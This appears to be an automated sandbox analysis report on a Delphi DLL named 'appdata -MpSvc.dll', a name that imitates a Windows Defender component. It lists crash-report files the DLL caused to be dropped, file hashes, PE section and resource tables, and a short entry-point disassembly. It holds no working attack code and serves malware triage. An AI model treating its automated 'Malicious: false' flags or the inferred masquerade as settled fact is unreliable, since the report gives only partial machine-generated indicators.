File Type:	Mini DuMP crash report, 14 streams, Fri Mar 8 18:43:11 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	44968
Entropy (8bit):	1.9974612778664782
Encrypted:	false
SSDEEP:	96:5I86jE3dtV+hqwXwO3Q2d8SkR0jdpXfRLYoi75I4v4O8djuq2AWaa4tsJSgrKVk2:p6OtV3rHcXjO5H4vM0XvHic6y
MD5:	C7A49DC52BA7F1504F111C1617134E6C
SHA1:	496A24147ED46CEDEB5B4BD74729F2DE848A6BE1
SHA-256:	FDB1ECAA8624BCD24570C3DB9679DBF93680DCA3B42DA0C41D8BA7B0C0BECF82
SHA-512:	A590D1088C289F25E78AF8AF96CC6A3A02D846A66D1CFD43A1D556CD7735F482DC81B4D09395BF4D209426C1A20523661E9EA752CFE2678D70917627596FE559
Malicious:	false
Preview:	MDMP..a..... .......?\.e........................(...........$...8,..........T.......8...........T...........@...h.......................................................................................................eJ......H.......GenuineIntel............T.......X...>\.e.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E60.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8342
Entropy (8bit):	3.688467563313183
Encrypted:	false
SSDEEP:	192:R6l7wVeJvC6x6Y5Qt6ggmf8Ao5N5prd89bj3sfcBm:R6lXJK6x6Yqt6ggmf8AoSj8fH
MD5:	F04EA33EBEDF1FE2E3B4262B6AE63496
SHA1:	4872151BAFC3F7B2022E089444372672CC482C6B
SHA-256:	88C71A371A4104C71E026836AFAA8CCA033DFF1172B7C1D04969038F95085CD8
SHA-512:	7C625EB54E53854235064D7D2A0822DE39A8EEB137F4CE49F05E26A0368B160A8987FE4CA84CFBB18DEB089CC1D0F263E7FDE1E684CF30EFDDD6B28D8A851FEC
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.4.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9EAF.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4759
Entropy (8bit):	4.445872756748884
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9m5WpW8VYqYm8M4JCdPvdFV+q8vjPvmAUGScSwd:uIjfNI7II7VSJyKCAUJ3wd
MD5:	354ACD7E02BE172CD431648F198482A9
SHA1:	C5317E55CA134A2BDC81AF9142BB1A369804B36A
SHA-256:	B7AE00E27320B3FE8ED6B01AD22742A383D08508421292B3D248082A2C2CE4E5
SHA-512:	3903F1FB469F8AB733467FC0ACAD08320539AA165EC53621D12081A05B8695200321E32B8477419D1C7823FCB389A6B08F955232946F5CF4E6CEDF56ED8D21F8
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="226665" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9EED.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8278
Entropy (8bit):	3.691456573595857
Encrypted:	false
SSDEEP:	192:R6l7wVeJZl6sZF6Y5QG6ggmfTM5N5pr389bjqsfvBm:R6lXJ76sZF6YqG6ggmfTMAjJfU
MD5:	5586BA8A4F4998473DEB266167433CFA
SHA1:	79C3F3BBA25019D81E773627E5C81F4D1B6F5F1F
SHA-256:	8C8961E231D8C12367411D53202E3773D7F4139D5E3FE26E53327DC609EAEB4F
SHA-512:	1ED467946D763B8D8942B1A09AA213BFC80279E4BFCF226A20FB4B557F2DC956FE7E7ADD0FAD08B66AD7225D3F3951A2AB6DEC5697DE4C7D44FEA0DC18051C75
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.4.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F2C.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4658
Entropy (8bit):	4.4615215256590215
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9m5WpW8VYk0Ym8M4JCdPvHF0+q8/ZT7gUGScSBd:uIjfNI7II7VLJ5kgUJ3Bd
MD5:	3535875783414EEC19184BC31A4D3530
SHA1:	A79EC858C613D3FF0EB4F0C9B7193A231E75F907
SHA-256:	AA1933C8B874A7A86A0A2917908AFCA35D0C5E05951F7123B8CAD0E25BF412B6
SHA-512:	2A45EEEEE1EAB35FE354B5CB8455DCA7014AD878BE7FF20B303494B47E4D1DF1E17EF4834CB857592848A36F7F5AB31BCACAD611AE95E7E589E52DD86E15964D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="226665" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA55.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Mar 8 18:43:16 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	116664
Entropy (8bit):	2.0301230657367295
Encrypted:	false
SSDEEP:	384:be89uXWNf5HrmhND3AOimkHVSXl2N811n2VedBFkMlI3cWc9Q1/iiPzD:bedX05rmbDBW40+j2VGkeGsibD
MD5:	9B93CE390A274A24617D5C9B7D812B2B
SHA1:	8DA51F6BD5B6D8E308FC581FB549A2DA639A448C
SHA-256:	16270D079D611820A94F814F3409C8619576DA37A879238B3208F44B98CB4E70
SHA-512:	B1F13D5CBBBF35DC50AB45A954FBE9EA27C135429F867FE3353FC9D975662E5F5278BBAA21BB8033FF5F0508E88543B4FA59F352C743BA94CFD416B67031FC28
Malicious:	false
Preview:	MDMP..a..... .......D\.e......................... ..............~S..........T.......8...........T............S...s..........l)..........X+..............................................................................eJ.......+......GenuineIntel............T...........>\.e.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF87.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8296
Entropy (8bit):	3.6935590253180215
Encrypted:	false
SSDEEP:	192:R6l7wVeJIzlA6w/gR6Y5e6ggmfT64c5N5prr89bMv0sfAkm:R6lXJIm6h6Yw6ggmfT64c0MvnfC
MD5:	73A75ED752E72A33683C3CD12C512D0A
SHA1:	15628AC253E62DC5799183B7A16A78D7387370AA
SHA-256:	663F74325C64861B01521C6E06193A04758C556FF62C6C97933FD00F66B6216F
SHA-512:	01A8A1A65613967AB2F1B2AB6093953C9D67F5B554FE3D92AE9147661C3E95DC98D1651BB6927C87E268B205FC68B57618D6359E87A7243D53A537E36CCBC58A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB40C.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4666
Entropy (8bit):	4.476457446273455
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9m5WpW8VYnYm8M4JCdPJFG+q8/uc6UGScS4d:uIjfNI7II7VTJda6UJ34d
MD5:	A72F6DB06FE2F4ABB549AB4B216742E0
SHA1:	C5AFBFD4FAE31B96793B817B3624B94482CE6981
SHA-256:	3D0CC1C50A8B0C4F50AA4028FC880553A9EB248209594511C3FE52337024BF2E
SHA-512:	7162DCEB3AFA48595D8C831B20BE8874A3C1B6DC1A3CF8F656EF3F25F07DA44A4210E7F3725FF71DD2893A6146B7DE72A7587EBED65227A9D74D22A4A964002B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="226665" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4693961863056355
Encrypted:	false
SSDEEP:	6144:szZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNFjDH5S:SZHtYZWOKnMM6bFpHj4
MD5:	2D21D0E9904539DB33241911286F3304
SHA1:	600B0AF69F2F63A685028CF01093A9F91E8D6620
SHA-256:	6FAA8B5C2D67CC6D915B8F0502450F07E3675B0BB012126F151A3D413E096F5B
SHA-512:	2A87A303D4B0FA9A358759F53D6080C5C23E3610AFF306730F0BEF6FF2C6DB080DC75EFFAA62271A53B40CCD2C2F19BAA6BFC14CA4A212A456BEBEA3E6302787
Malicious:	false
Preview:	regfJ...J....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...r.q.................................................................................................................................................................................................................................................................................................................................................F........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	1.0541805421345023
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 95.46% Win32 EXE PECompact compressed (generic) (41571/9) 3.96% Win16/32 Executable Delphi generic (2074/23) 0.20% Generic Win/DOS Executable (2004/3) 0.19% DOS Executable Generic (2002/1) 0.19%
File name:	appdata -MpSvc.dll
File size:	26'239'902 bytes
MD5:	504356291f6139c3400cdd7842bc1406
SHA1:	eaae969b5db3779fbb9a1bba694468b003822c77
SHA256:	34a5017f3894d9d403fd2c5baa03d7bb6b9c28afb74e36010310af8f601602fb
SHA512:	260fa1552a7222b90707035c93899a281c996d0316f75946195c40710e60992f3555ad01fec03c45eb81710064d8947939a5e1c6e5f3cd617aa1374ba645bb19
SSDEEP:	24576:cMVKcnCjOGVNZXkLkswbSZ+UJ2L4yE9Ivvo5nlgzNNqFBsS4ETlX/sTTz7GMLIrN:7Y2UnaJGEF6S40sTbGM0oTAiEwdwb
TLSH:	9D476D23B684763AC07F1A395427A654993FB76235969DAF57F00C4CCF365802A3FA0B
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x650898
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x65D69275 [Thu Feb 22 00:16:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	4c1f56b4c50db99105e4a3eba0452881

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFC0h
mov eax, 00647210h
call 00007F32105EF9C5h
call 00007F32105E8A4Ch
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x266000	0xd2	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x261000	0x3f00	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x29e000	0xc800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x268000	0x352e0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x261bb4	0x9ac	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x265000	0xac6	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x24d310	0x24d400	88c3eda7ab2c914c2a9c5a5264606dab	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x24f000	0x18b0	0x1a00	a0dbfab2a75d6871c6c2fd045fb0b7e2	False	0.5171274038461539	data	6.1638649467993485	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x251000	0x8eac	0x9000	6bc1cd1916205358cb83ad1716ba5a53	False	0.5597059461805556	data	6.102741094473156	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x25a000	0x6d4c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x261000	0x3f00	0x4000	0b256511ccbf3690e4608b76222cb9d6	False	0.30609130859375	data	5.133668405694886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0x265000	0xac6	0xc00	5d7ace3d0cc4aba26eb6a03d4ed33b64	False	0.3277994791666667	data	3.924768163545641	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x266000	0xd2	0x200	7baa57fb3a575a2793f3eca6fe25464f	False	0.353515625	data	2.5812448053415076	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rdata	0x267000	0x44	0x200	c9f8bfa36b2dc5163b75d3196d251b45	False	0.15625	data	1.1660636886017055	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x268000	0x352e0	0x35400	6f0174c94dbdb677a8c35c4bea9ef968	False	0.561656396713615	data	6.7153508191439295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x29e000	0xc800	0xc800	042c0351f4331fdf7d6d9f7df2537c05	False	0.2859765625	data	4.749895191517642	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x29ed74	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x29eea8	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x29efdc	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x29f110	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x29f244	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x29f378	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x29f4ac	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x29f5e0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x29f7b0	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x29f994	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x29fb64	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x29fd34	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x29ff04	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x2a00d4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x2a02a4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x2a0474	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x2a0644	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x2a0814	0x98	Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors	English	United States	0.5197368421052632
RT_BITMAP	0x2a08ac	0x98	Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors	English	United States	0.506578947368421
RT_STRING	0x2a0944	0xb08	data			0.2730169971671388
RT_STRING	0x2a144c	0x898	data			0.28863636363636364
RT_STRING	0x2a1ce4	0x368	data			0.32798165137614677
RT_STRING	0x2a204c	0x434	data			0.40427509293680297
RT_STRING	0x2a2480	0x1b0	data			0.5532407407407407
RT_STRING	0x2a2630	0xcc	data			0.6666666666666666
RT_STRING	0x2a26fc	0x28c	data			0.4294478527607362
RT_STRING	0x2a2988	0x160	data			0.5454545454545454
RT_STRING	0x2a2ae8	0x350	data			0.42806603773584906
RT_STRING	0x2a2e38	0x414	data			0.3611111111111111
RT_STRING	0x2a324c	0x358	data			0.3820093457943925
RT_STRING	0x2a35a4	0x4f8	data			0.3026729559748428
RT_STRING	0x2a3a9c	0x2c4	data			0.3375706214689266
RT_STRING	0x2a3d60	0x3c0	data			0.428125
RT_STRING	0x2a4120	0x434	data			0.3745353159851301
RT_STRING	0x2a4554	0x4cc	data			0.3713355048859935
RT_STRING	0x2a4a20	0x454	data			0.3303249097472924
RT_STRING	0x2a4e74	0x38c	data			0.3535242290748899
RT_STRING	0x2a5200	0x450	data			0.3858695652173913
RT_STRING	0x2a5650	0x200	data			0.412109375
RT_STRING	0x2a5850	0xc4	data			0.6428571428571429
RT_STRING	0x2a5914	0x170	data			0.5597826086956522
RT_STRING	0x2a5a84	0x334	data			0.41585365853658535
RT_STRING	0x2a5db8	0x408	data			0.3168604651162791
RT_STRING	0x2a61c0	0x38c	data			0.3876651982378855
RT_STRING	0x2a654c	0x2b4	data			0.4263005780346821
RT_RCDATA	0x2a6800	0x10	data			1.5
RT_RCDATA	0x2a6810	0x74c	data			0.5321199143468951
RT_RCDATA	0x2a6f5c	0x2	data	English	United States	5.0
RT_RCDATA	0x2a6f60	0x122a	Delphi compiled form 'TF_LicenseGen'			0.37827956989247313
RT_RCDATA	0x2a818c	0xa6b	Delphi compiled form 'TF_MatchMerge'			0.44169478815148105
RT_RCDATA	0x2a8bf8	0xa66	Delphi compiled form 'TMainForm'			0.4560480841472577
RT_RCDATA	0x2a9660	0x981	Delphi compiled form 'TRulesForm'			0.5187011919441019
RT_RCDATA	0x2a9fe4	0x363	Delphi compiled form 'TStats'			0.5686274509803921
RT_GROUP_CURSOR	0x2aa348	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
